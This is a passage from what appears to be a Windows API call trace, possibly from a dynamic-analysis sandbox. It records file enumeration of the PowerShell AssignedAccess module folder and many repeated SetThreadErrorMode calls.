ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0140.142] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0140.142] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0140.142] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.142] FindClose (in: hFindFile=0x1e3371a24e0 | out: hFindFile=0x1e3371a24e0) returned 1 [0140.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.142] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0140.143] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.143] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.143] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0140.143] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0140.143] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0140.143] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0140.143] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.143] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0xb156f8d8f0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0140.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.143] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess"), fInfoLevelId=0x0, lpFileInformation=0xb156f8de20 | out: lpFileInformation=0xb156f8de20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0140.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.143] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0xb156f8d870, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0140.143] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\*"), lpFindFileData=0xb156f8daa0 | out: lpFindFileData=0xb156f8daa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.144] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.144] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0140.144] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0140.144] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0140.144] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.144] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.144] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1")) returned 0x20 [0140.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dba0) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dad0) returned 1 [0140.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8da90) returned 1 [0140.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dba0) returned 1 [0140.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dad0) returned 1 [0140.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8da90) returned 1 [0140.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dbb0) returned 1 [0140.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8db70) returned 1 [0140.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dc00) returned 1 [0140.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8db30) returned 1 [0140.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8daf0) returned 1 [0140.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 